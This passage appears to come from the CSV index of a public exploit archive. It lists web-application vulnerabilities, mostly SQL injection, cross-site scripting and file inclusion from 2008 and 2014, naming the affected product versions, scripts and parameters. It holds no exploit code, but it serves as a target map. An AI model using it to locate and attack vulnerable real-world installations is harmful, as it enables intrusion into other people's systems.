Injection",2008-05-26,Unohope,php,webapps, -31846,exploits/php/webapps/31846.txt,"ClassSystem 2.0/2.3 - 'HomepageTop.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps, -31847,exploits/php/webapps/31847.txt,"ClassSystem 2.0/2.3 - 'HomepageMain.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps, -31848,exploits/php/webapps/31848.txt,"ClassSystem 2.0/2.3 - 'MessageReply.php?teacher_id' SQL Injection",2008-05-26,Unohope,php,webapps, -31849,exploits/php/webapps/31849.html,"ClassSystem 2.0/2.3 - 'class/ApplyDB.php' Unrestricted Arbitrary File Upload / Arbitrary Code Execution",2008-05-26,Unohope,php,webapps, -31850,exploits/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' Cross-Site Scripting",2008-05-26,Unohope,asp,webapps, -31851,exploits/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - '/post3/view.asp?id' SQL Injection",2008-05-26,Unohope,asp,webapps, -31852,exploits/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - '/post3/book.asp?review' SQL Injection",2008-05-26,Unohope,asp,webapps, -31854,exploits/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access",2008-05-26,Unohope,asp,webapps, -31855,exploits/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting",2008-05-27,ZoRLu,php,webapps, -31857,exploits/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,php,webapps, -31858,exploits/php/webapps/31858.txt,"Calcium 3.10/4.0.4 - 'Calcium40.pl' Cross-Site Scripting",2008-05-28,"Marvin Simkin",php,webapps, -31859,exploits/asp/webapps/31859.txt,"JustPORTAL 1.0 - 'site' Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps, -31860,exploits/asp/webapps/31860.txt,"Proje ASP Portal 2.0 - 'id' Multiple SQL Injections",2008-05-29,"Ugurcan Engin",asp,webapps, -31861,exploits/asp/webapps/31861.txt,"dvbbs 8.2 - 'login.asp' Multiple SQL Injections",2008-05-29,hackerbinhphuoc,asp,webapps, -31865,exploits/asp/webapps/31865.txt,"DotNetNuke 4.8.3 - 'Default.aspx' Cross-Site Scripting",2008-05-30,"AmnPardaz Security Research Team",asp,webapps, -31866,exploits/php/webapps/31866.txt,"TorrentTrader Classic 1.x - 'scrape.php' SQL Injection",2008-05-31,"Charles Vaughn",php,webapps, -31867,exploits/php/webapps/31867.php,"CMS Easyway - 'mid' SQL Injection",2008-05-30,Lidloses_Auge,php,webapps, -31868,exploits/php/webapps/31868.txt,"OtomiGenX 2.2 - 'userAccount' SQL Injection",2008-06-02,hadihadi,php,webapps, -31869,exploits/asp/webapps/31869.txt,"i-pos StoreFront 1.3 - 'index.asp' SQL Injection",2008-06-02,KnocKout,asp,webapps, -31870,exploits/php/webapps/31870.pl,"Joomla! / Mambo Component Joo!BB 0.5.9 - 'forum' SQL Injection",2008-06-02,His0k4,php,webapps, -31871,exploits/asp/webapps/31871.txt,"Te Ecard - 'id' Multiple SQL Injections",2008-06-02,"Ugurcan Engyn",asp,webapps, -31874,exploits/jsp/webapps/31874.py,"Ganib Project Management 2.3 - SQL Injection",2014-02-24,drone,jsp,webapps,80 -31880,exploits/php/webapps/31880.txt,"WyMIEN PHP 1.0 - 'index.php' Cross-Site Scripting",2008-06-04,ZoRLu,php,webapps, -31881,exploits/php/webapps/31881.txt,"PHP Address Book 3.1.5 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-06-04,"CWH Underground",php,webapps, -31882,exploits/php/webapps/31882.txt,"SamTodo 1.1 - 'tid' Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps, -31883,exploits/php/webapps/31883.txt,"SamTodo 1.1 - 'completed' Cross-Site Scripting",2008-06-05,"David Sopas Ferreira",php,webapps, -31888,exploits/php/webapps/31888.txt,"SchoolCenter 7.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-06-06,Doz,php,webapps, -31891,exploits/asp/webapps/31891.txt,"Real Estate Website 1.0 - 'location.asp' Multiple Input Validation Vulnerabilities",2008-06-09,JosS,asp,webapps, -31892,exploits/cgi/webapps/31892.txt,"Tornado Knowledge Retrieval System 4.2 - 'p' Cross-Site Scripting",2008-06-10,Unohope,cgi,webapps, -31893,exploits/php/webapps/31893.txt,"Hot Links SQL-PHP - Multiple Cross-Site Scripting Vulnerabilities",2008-06-10,sl4xUz,php,webapps, -31894,exploits/hardware/webapps/31894.txt,"Technicolor TC7200 - Credentials Disclosure",2014-02-25,"Jeroen - IT Nerdbox",hardware,webapps,80 -31896,exploits/ios/webapps/31896.txt,"WiFiles HD 1.3 iOS - Local File Inclusion",2014-02-25,Vulnerability-Lab,ios,webapps,8080 -31898,exploits/php/webapps/31898.txt,"Sendy 1.1.8.4 - SQL Injection",2014-02-25,Hurley,php,webapps,80 -31900,exploits/ios/webapps/31900.txt,"Private Camera Pro 5.0 iOS - Multiple Vulnerabilities",2014-02-25,Vulnerability-Lab,ios,webapps, -31902,exploits/php/webapps/31902.txt,"Noticia Portal - 'detalle_noticia.php' SQL Injection",2008-06-10,t@nzo0n,php,webapps, -31904,exploits/php/webapps/31904.txt,"PHPEasyData 1.5.4 - 'annuaire.php?annuaire' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps, -31905,exploits/php/webapps/31905.txt,"PHPEasyData 1.5.4 - '/admin/login.php?Username' SQL Injection",2008-06-11,"Sylvain THUAL",php,webapps, -31906,exploits/php/webapps/31906.txt,"PHPEasyData 1.5.4 - 'last_records.php?annuaire' Cross-Site Scripting",2008-06-11,"Sylvain THUAL",php,webapps, -31907,exploits/php/webapps/31907.txt,"PHPEasyData 1.5.4 - 'annuaire.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-11,"Sylvain THUAL",php,webapps, -31908,exploits/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps, -31910,exploits/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Cross-Site Scripting",2008-06-13,anonymous,php,webapps, -31916,exploits/php/webapps/31916.txt,"Piwigo 2.6.1 - Cross-Site Request Forgery",2014-02-26,killall-9,php,webapps,80 -31929,exploits/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,php,webapps, -31933,exploits/php/webapps/31933.txt,"OpenDocMan 1.x - 'out.php' Cross-Site Scripting",2008-06-17,"Sergi Rosello",php,webapps, -31938,exploits/php/webapps/31938.txt,"KEIL Software PhotoKorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps, -31939,exploits/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps, -31943,exploits/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,AmnPardaz,php,webapps, -32214,exploits/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 -31944,exploits/php/webapps/31944.txt,"phpAuction - 'profile.php' SQL Injection (2)",2008-06-21,Mr.SQL,php,webapps, -31945,exploits/php/webapps/31945.txt,"PEGames - Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps, -31946,exploits/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Multiple Remote File Inclusions",2008-06-23,CraCkEr,php,webapps, -31947,exploits/php/webapps/31947.txt,"Joomla! Component EXP Shop 1.0 - SQL Injection",2008-06-22,His0k4,php,webapps, -31948,exploits/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps, -31949,exploits/php/webapps/31949.txt,"Chipmunk Blog - 'members.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps, -31950,exploits/php/webapps/31950.txt,"Chipmunk Blog - 'comments.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps, -31951,exploits/php/webapps/31951.txt,"Chipmunk Blog - 'photos.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps, -31952,exploits/php/webapps/31952.txt,"Chipmunk Blog - 'archive.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps, -31953,exploits/php/webapps/31953.txt,"Chipmunk Blog - 'cat.php' Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps, -31954,exploits/php/webapps/31954.txt,"Benja CMS 0.1 - '/admin/admin_edit_submenu.php' Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps, -31955,exploits/php/webapps/31955.txt,"Benja CMS 0.1 - '/admin/admin_new_submenu.php' Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps, -31956,exploits/php/webapps/31956.txt,"Benja CMS 0.1 - '/admin/admin_edit_topmenu.php' Cross-Site Scripting",2008-06-23,"CWH Underground",php,webapps, -31960,exploits/php/webapps/31960.txt,"A+ PHP Scripts News Management System 0.3 - Multiple Input Validation Vulnerabilities",2008-06-23,CraCkEr,php,webapps, -31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,php,webapps,80 -31962,exploits/ios/webapps/31962.txt,"Bluetooth Photo Share Pro 2.0 iOS - Multiple Vulnerabilities",2014-02-27,Vulnerability-Lab,ios,webapps,8080 -31967,exploits/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway - Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps, -32135,exploits/php/webapps/32135.txt,"common Solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps, -32046,exploits/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - '/debug.jsp' HTML Injection / Information Disclosure",2008-07-11,"Deniz Cevik",jsp,webapps, -32047,exploits/php/webapps/32047.txt,"Hudson 1.223 - 'q' Cross-Site Scripting",2008-07-11,syniack,php,webapps, -31970,exploits/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80 -31971,exploits/php/webapps/31971.txt,"PHP Ticket System Beta 1 - 'get_all_created_by_user.php?id' SQL Injection",2014-02-28,HauntIT,php,webapps,80 -32094,exploits/cgi/webapps/32094.pl,"HiFriend - 'cgi-bin/hifriend.pl' Open Email Relay",2008-07-21,Perforin,cgi,webapps, -31975,exploits/php/webapps/31975.txt,"The Rat CMS - 'viewarticle.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-26,"CWH Underground",php,webapps, -31976,exploits/php/webapps/31976.txt,"The Rat CMS - 'viewarticle2.php?id' Cross-Site Scripting",2008-06-26,"CWH Underground",php,webapps, -31977,exploits/php/webapps/31977.txt,"The Rat CMS - 'viewarticle.php?id' SQL Injection",2008-06-26,"CWH Underground",php,webapps, -31978,exploits/php/webapps/31978.txt,"The Rat CMS - 'viewarticle2.php?id' SQL Injection",2008-06-26,"CWH Underground",php,webapps, -31982,exploits/php/webapps/31982.txt,"Webuzo 2.1.3 - Multiple Vulnerabilities",2014-02-28,Mahendra,php,webapps,80 -32134,exploits/php/webapps/32134.txt,"H0tturk Panel - 'gizli.php' Remote File Inclusion",2008-07-31,U238,php,webapps, -31983,exploits/multiple/webapps/31983.txt,"Plex Media Server 0.9.9.2.374-aa23a69 - Multiple Vulnerabilities",2014-02-28,"SEC Consult",multiple,webapps,32400 -31986,exploits/php/webapps/31986.txt,"WordPress Plugin VideoWhisper 4.27.3 - Multiple Vulnerabilities",2014-02-28,"High-Tech Bridge SA",php,webapps,80 -31989,exploits/php/webapps/31989.txt,"webERP 4.11.3 - 'SalesInquiry.php?SortBy' SQL Injection",2014-02-28,HauntIT,php,webapps,80 -31990,exploits/multiple/webapps/31990.txt,"SpagoBI 4.0 - Privilege Escalation",2014-02-28,"Christian Catalano",multiple,webapps, -31992,exploits/windows/webapps/31992.txt,"Oracle Demantra 12.2.1 - Arbitrary File Disclosure",2014-03-01,Portcullis,windows,webapps, -31993,exploits/windows/webapps/31993.txt,"Oracle Demantra 12.2.1 - SQL Injection",2014-03-01,Portcullis,windows,webapps,8080 -31994,exploits/windows/webapps/31994.txt,"Oracle Demantra 12.2.1 - Persistent Cross-Site Scripting",2014-03-01,Portcullis,windows,webapps,8080 -31995,exploits/windows/webapps/31995.txt,"Oracle Demantra 12.2.1 - Database Credentials Disclosure",2014-03-01,Portcullis,windows,webapps,8080 -32001,exploits/php/webapps/32001.txt,"RSS-aggregator 1.0 - 'IdFlux' SQL Injection",2008-06-30,"CWH Underground",php,webapps, -32002,exploits/php/webapps/32002.txt,"RSS-aggregator 1.0 - 'IdTag' SQL Injection",2008-06-30,"CWH Underground",php,webapps, -32003,exploits/php/webapps/32003.txt,"RSS-aggregator 1.0 - Authentication Bypass",2008-06-30,"CWH Underground",php,webapps, -32004,exploits/php/webapps/32004.txt,"FaName 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps, -32005,exploits/php/webapps/32005.txt,"FaName 1.0 - 'page.php?name' Cross-Site Scripting",2008-06-30,"Jesper Jurcenoks",php,webapps, -32131,exploits/php/webapps/32131.txt,"ClipSharePro 4.1 - Local File Inclusion",2014-03-09,"Saadi Siddiqui",php,webapps, -32010,exploits/php/webapps/32010.txt,"Joomla! / Mambo Component com_is 1.0.1 - Multiple SQL Injections",2008-07-02,"H-T Team",php,webapps, -32011,exploits/php/webapps/32011.txt,"DodosMail 2.5 - 'dodosmail.php' Local File Inclusion",2008-07-07,ahmadbady,php,webapps, -32013,exploits/php/webapps/32013.txt,"Zoph 0.7.2.1 - SQL Injection",2008-07-07,"Julian Rodriguez",php,webapps, -32014,exploits/php/webapps/32014.txt,"Zoph 0.7.2.1 - 'search.php?_off' Cross-Site Scripting",2008-07-07,"Julian Rodriguez",php,webapps, -32015,exploits/php/webapps/32015.txt,"PHP-Nuke 4ndvddb 0.91 Module - 'id' SQL Injection",2008-07-07,Lovebug,php,webapps, -32016,exploits/php/webapps/32016.pl,"Fuzzylime (cms) 3.01 - 'blog.php' Local File Inclusion",2008-07-07,Cod3rZ,php,webapps, -32017,exploits/php/webapps/32017.html,"vBulletin 3.7.1 - 'admincp/faq.php?Injection adminlog.php' Cross-Site Scripting",2008-07-08,"Jessica Hope",php,webapps, -32020,exploits/php/webapps/32020.txt,"PageFusion 1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps, -32021,exploits/php/webapps/32021.txt,"Xomol CMS 1.2 - '/index.php' HTML Injection / Cross-Site Scripting",2008-07-09,"Julian Rodriguez",php,webapps, -32022,exploits/php/webapps/32022.txt,"TGS Content Management 0.3.2r2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps, -32023,exploits/php/webapps/32023.txt,"TGS Content Management 0.3.2r2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-09,"Julian Rodriguez",php,webapps, -32024,exploits/php/webapps/32024.txt,"V-Webmail 1.6.4 - '/includes/pear/Mail/RFC822.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32025,exploits/php/webapps/32025.txt,"V-Webmail 1.6.4 - '/includes/pear/Net/Socket.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32026,exploits/php/webapps/32026.txt,"V-Webmail 1.6.4 - '/includes/pear/XML/parser.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32027,exploits/php/webapps/32027.txt,"V-Webmail 1.6.4 - '/includes/pear/XML/Tree.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32028,exploits/php/webapps/32028.txt,"V-Webmail 1.6.4 - '/includes/pear/Mail/mimeDecode.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32029,exploits/php/webapps/32029.txt,"V-Webmail 1.6.4 - '/includes/pear/Console/Getopt.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32030,exploits/php/webapps/32030.txt,"V-Webmail 1.6.4 - '/includes/pear/System.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32031,exploits/php/webapps/32031.txt,"V-Webmail 1.6.4 - '/includes/pear/Log.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32032,exploits/php/webapps/32032.txt,"V-Webmail 1.6.4 - '/includes/pear/File.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32033,exploits/php/webapps/32033.txt,"V-Webmail 1.6.4 - '/includes/prepend.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32034,exploits/php/webapps/32034.txt,"V-Webmail 1.6.4 - '/includes/cachedConfig.php?CONFIG[pear_dir]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32035,exploits/php/webapps/32035.txt,"V-Webmail 1.6.4 - '/includes/prepend.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32036,exploits/php/webapps/32036.txt,"V-Webmail 1.6.4 - '/includes/email.list.search.php?CONFIG[includes]' Remote File Inclusion",2008-07-10,CraCkEr,php,webapps, -32037,exploits/php/webapps/32037.txt,"couponPHP CMS 1.0 - Multiple Persistent Cross-Site Scripting / SQL Injections",2014-03-03,LiquidWorm,php,webapps, -32038,exploits/php/webapps/32038.txt,"SpagoBI 4.0 - Persistent Cross-Site Scripting",2014-03-03,"Christian Catalano",php,webapps, -32039,exploits/php/webapps/32039.txt,"SpagoBI 4.0 - Persistent HTML Script Insertion",2014-03-03,"Christian Catalano",php,webapps, -32040,exploits/php/webapps/32040.txt,"SpagoBI 4.0 - Arbitrary Cross-Site Scripting / Arbitrary File Upload",2014-03-03,"Christian Catalano",php,webapps, -32283,exploits/php/webapps/32283.txt,"Scripts4Profit DXShopCart 4.30 - 'pid' SQL Injection",2008-08-21,"Hussin X",php,webapps, -32284,exploits/php/webapps/32284.txt,"Simasy CMS - 'id' SQL Injection",2008-08-21,r45c4l,php,webapps, -32051,exploits/php/webapps/32051.php,"Pubs Black Cat [The Fun] - 'browse.groups.php' SQL Injection",2008-07-14,RMx,php,webapps, -32053,exploits/php/webapps/32053.txt,"WordPress 2.5.1 - 'press-this.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-15,anonymous,php,webapps, -32057,exploits/php/webapps/32057.txt,"Evaria ECMS 1.1 - 'DOCUMENT_ROOT' Multiple Remote File Inclusions",2008-07-16,ahmadbady,php,webapps, -32058,exploits/php/webapps/32058.txt,"OpenPro 1.3.1 - 'search_wA.php' Remote File Inclusion",2008-07-16,"Ghost Hacker",php,webapps, -32059,exploits/php/webapps/32059.txt,"Claroline 1.8.9 - 'announcements/announcements.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32060,exploits/php/webapps/32060.txt,"Claroline 1.8.9 - 'calendar/agenda.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32061,exploits/php/webapps/32061.txt,"Claroline 1.8.9 - 'course/index.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32062,exploits/php/webapps/32062.txt,"Claroline 1.8.9 - 'course_description/index.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32063,exploits/php/webapps/32063.txt,"Claroline 1.8.9 - 'document/document.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32064,exploits/php/webapps/32064.txt,"Claroline 1.8.9 - 'exercise/exercise.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32065,exploits/php/webapps/32065.txt,"Claroline 1.8.9 - 'group/group_space.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32066,exploits/php/webapps/32066.txt,"Claroline 1.8.9 - '/phpBB/newtopic.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32067,exploits/php/webapps/32067.txt,"Claroline 1.8.9 - 'phpBB/reply.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32068,exploits/php/webapps/32068.txt,"Claroline 1.8.9 - 'phpBB/viewtopic.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32069,exploits/php/webapps/32069.txt,"Claroline 1.8.9 - 'wiki/wiki.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32070,exploits/php/webapps/32070.txt,"Claroline 1.8.9 - 'work/work.php' Cross-Site Scripting",2008-07-15,"Digital Security Research Group",php,webapps, -32071,exploits/php/webapps/32071.txt,"Claroline 1.8.9 - '/claroline/redirector.php?url' Arbitrary Site Redirect",2008-07-15,"Digital Security Research Group",php,webapps, -32075,exploits/php/webapps/32075.txt,"OpenDocMan 1.2.7 - Multiple Vulnerabilities",2014-03-05,"High-Tech Bridge SA",php,webapps,80 -32076,exploits/php/webapps/32076.txt,"Ilch CMS 2.0 - Persistent Cross-Site Scripting",2014-03-05,"High-Tech Bridge SA",php,webapps,80 -32077,exploits/php/webapps/32077.txt,"IBS 0.15 - 'Username' Cross-Site Scripting",2008-07-17,Cyb3r-1sT,php,webapps, -32078,exploits/php/webapps/32078.php,"Community CMS 0.1 - 'include.php' Remote File Inclusion",2008-07-17,N3TR00T3R,php,webapps, -32079,exploits/php/webapps/32079.txt,"CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps, -32080,exploits/php/webapps/32080.txt,"CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion",2008-07-18,Ciph3r,php,webapps, -32081,exploits/php/webapps/32081.txt,"Lemon CMS 1.10 - 'browser.php' Local File Inclusion",2008-07-18,Ciph3r,php,webapps, -32082,exploits/php/webapps/32082.txt,"Def_Blog 1.0.3 - 'comaddok.php?article' SQL Injection",2008-07-18,"CWH Underground",php,webapps, -32083,exploits/php/webapps/32083.txt,"Def_Blog 1.0.3 - 'comlook.php?article' SQL Injection",2008-07-18,"CWH Underground",php,webapps, -32085,exploits/php/webapps/32085.txt,"PHPFreeChat 1.1 - 'demo21_with_hardocded_urls.php' Cross-Site Scripting",2008-07-18,ahmadbady,php,webapps, -32087,exploits/php/webapps/32087.txt,"EasyBookMarker 4.0 - 'ajaxp_backend.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps, -32088,exploits/php/webapps/32088.pl,"EasyDynamicPages 3.0 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-07-21,Dr.Crash,php,webapps, -32089,exploits/php/webapps/32089.pl,"EasyPublish 3.0 - 'read' Multiple SQL Injections / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps, -32090,exploits/php/webapps/32090.txt,"Maran PHP Blog - 'comments.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps, -32091,exploits/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps, -32092,exploits/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps, -32093,exploits/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps, -32096,exploits/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps, -32097,exploits/php/webapps/32097.txt,"XOOPS 2.0.18 - '/modules/system/admin.php?fct' Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps, -32098,exploits/php/webapps/32098.txt,"XOOPS 2.0.18 - '/modules/system/admin.php?fct' Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps, -32099,exploits/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps, -32100,exploits/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Remote File Inclusion",2008-07-21,Ciph3r,php,webapps, -32101,exploits/php/webapps/32101.txt,"eSyndiCat 1.6 - 'admin_lng' Cookie Authentication Bypass",2008-07-21,Ciph3r,php,webapps, -32102,exploits/php/webapps/32102.txt,"AlphAdmin CMS 1.0.5_03 - 'aa_login' Cookie Authentication Bypass",2008-07-21,Ciph3r,php,webapps, -32106,exploits/php/webapps/32106.txt,"Claroline 1.8 - 'learnPath/calendar/myagenda.php' Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps, -32107,exploits/php/webapps/32107.txt,"Claroline 1.8 - 'user/user.php' Query String Cross-Site Scripting",2008-07-22,DSecRG,php,webapps, -32108,exploits/php/webapps/32108.txt,"Claroline 1.8 - '/tracking/courseLog.php?view' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps, -32109,exploits/php/webapps/32109.txt,"Claroline 1.8 - '/tracking/toolaccess_details.php?toolId' Cross-Site Scripting",2008-07-22,DSecRG,php,webapps, -32111,exploits/asp/webapps/32111.txt,"Pre Survey Generator - 'default.asp' SQL Injection",2008-07-22,DreamTurk,asp,webapps, -32113,exploits/php/webapps/32113.txt,"EMC Centera Universal Access 4.0_4735.p4 - 'Username' SQL Injection",2008-07-23,"Lars Heidelberg",php,webapps, -32114,exploits/php/webapps/32114.txt,"AtomPhotoBlog 1.15 - 'atomPhotoBlog.php' SQL Injection",2008-07-24,Mr.SQL,php,webapps, -32115,exploits/php/webapps/32115.txt,"Ajax File Manager - Directory Traversal",2014-03-07,"Eduardo Alves",php,webapps, -32116,exploits/php/webapps/32116.txt,"EZContents - 'minicalendar.php' Remote File Inclusion",2008-07-25,"HACKERS PAL",php,webapps, -32117,exploits/php/webapps/32117.txt,"Willoughby TriO 2.1 - SQL Injection",2008-07-26,dun,php,webapps, -32118,exploits/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",php,webapps, -32119,exploits/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - 'admin_group_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,asp,webapps, -32120,exploits/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - 'admin_category_details.asp?mode' Cross-Site Scripting",2008-07-28,CSDT,asp,webapps, -32121,exploits/php/webapps/32121.php,"Jamroom 3.3.8 - Cookie Authentication Bypass",2008-07-28,"James Bercegay",php,webapps, -32122,exploits/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps, -32123,exploits/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusions",2008-07-29,"Ghost Hacker",php,webapps, -32126,exploits/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps, -32128,exploits/php/webapps/32128.txt,"MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps, -32130,exploits/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps, -32139,exploits/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps, -32140,exploits/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' SQL Injection",2008-08-01,"H4ckCity Security Team",php,webapps, -32141,exploits/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps, -32142,exploits/php/webapps/32142.php,"Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps, -32143,exploits/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps, -32144,exploits/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps, -32145,exploits/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps, -32146,exploits/php/webapps/32146.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps, -32147,exploits/php/webapps/32147.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps, -32148,exploits/php/webapps/32148.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps, -32149,exploits/php/webapps/32149.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps, -32150,exploits/php/webapps/32150.txt,"UNAK-CMS 1.5 - 'connector.php' Local File Inclusion",2008-08-04,"Sina Yazdanmehr",php,webapps, -32151,exploits/asp/webapps/32151.pl,"Pcshey Portal - 'kategori.asp' SQL Injection",2008-08-04,U238,asp,webapps, -32157,exploits/asp/webapps/32157.txt,"Kentico CMS 7.0.75 - User Information 